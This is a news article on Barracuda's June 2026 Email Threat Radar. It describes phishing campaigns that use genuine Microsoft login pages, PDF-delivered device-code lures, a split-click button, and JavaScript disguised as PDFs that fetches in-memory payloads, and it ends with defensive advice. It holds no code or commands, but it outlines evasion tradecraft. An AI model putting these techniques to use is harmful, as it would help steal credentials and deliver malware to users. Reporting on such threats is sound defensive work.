Barracuda warns of Microsoft phishing & malware rise

Barracuda has published its June 2026 Email Threat Radar, which identifies a rise in phishing attacks that use genuine Microsoft login pages, PDF attachments and malware delivery techniques.

The report describes several campaigns targeting organisations and employees, including attacks designed to steal session tokens as well as passwords, and emails that progress from credential theft to delivering malicious scripts and fileless malware.

One notable technique involved a phishing campaign run through the Tycoon 2FA phishing-as-a-service platform. Recipients received an email warning that their inbox was nearly full and were prompted to release held messages through a button embedded in what appeared to be a calendar invite.

The link sent users to a real Microsoft login page controlled through attacker infrastructure. After users entered their credentials, the attackers could capture session tokens and access permissions, giving them access to email, online files and linked Microsoft 365 services. Victims were then asked to enter their credentials again on a fake page, allowing the attackers to collect passwords as well.

This approach differs from standard phishing attempts because it uses a genuine Microsoft domain rather than an imitation page. The use of calendar invites also makes the campaign harder to detect through traditional email defences, as invitations are less commonly monitored than links in message bodies.

PDF lure

Researchers also reported device code phishing attacks in which suspicious links were moved from the email body into a PDF attachment. The message asked recipients to open an attachment tied to a compliance or payment issue, and the PDF then directed them to a fake device authentication process.

Unlike earlier device code phishing operations that used real Microsoft application programming interfaces, this campaign generated fake device codes locally in the browser. The pages mimicked the legitimate device code authorisation flow used when linking apps and devices to Microsoft accounts.

The campaign also used CAPTCHA to limit automated scanning and sandbox analysis. Its phishing pages expired automatically after a set period, reducing the time available for investigators and security teams to inspect the infrastructure.

Split-click method

Another campaign used what Barracuda described as a rare split-click technique. The email warned that a user's mailbox was full and included a single "Resolve Issue" button, but the outcome changed depending on where the user clicked.

Clicking the top half of the button opened a legitimate Microsoft page, while clicking the bottom half sent the user through a malicious redirect. That path opened a browser-generated blob URL before directing the target to a phishing page linked to the Sneaky 2FA phishing-as-a-service platform, where credentials and other information were harvested.

Using two outcomes from a single button appears intended to evade automated link analysis tools, which may detect only the harmless destination. Blob URLs are also harder for conventional inspection and blocking tools to analyse because they are created dynamically by the browser.

Malware shift

The report also points to a broader shift in phishing campaigns from credential theft to malware delivery. In one example, a fake invoice notification led victims to what appeared to be a harmless file called "Invoice.pdf (11.3 KB)", but the download was actually a malicious JavaScript file.

The script concealed malicious code through steganography and obfuscation. Once executed, it could load additional malware, gather system information, establish persistence and communicate with attacker-controlled infrastructure.

A separate campaign impersonated the Social Security Administration to distribute another JavaScript file disguised as a payment receipt PDF. In that case, the script reconstructed a hidden web address, fetched a second-stage payload from a remote server and ran it directly in memory using Windows ActiveX components.

By running in memory and avoiding obvious file drops, such malware can be less visible to traditional security tools. These methods can be used to deploy credential stealers, banking trojans and other malicious software.

Researchers also observed a multi-step Microsoft impersonation attack in which an HTML file led the recipient to a fake OneDrive page and then to an Excel login screen. The layered redirection was used to disguise the malicious intent and increase the likelihood of credential theft.

The report recommends that organisations protect identities and session tokens as well as passwords, and extend detection beyond standard email scanning to include calendar invites, attachments and login flows. It also recommends improving attachment and endpoint protection and updating staff training to reflect phishing methods that can bypass long-established controls.

Among the more striking findings was the extent to which attackers used real services, expiring infrastructure and browser-based techniques to make phishing pages harder to detect and investigate.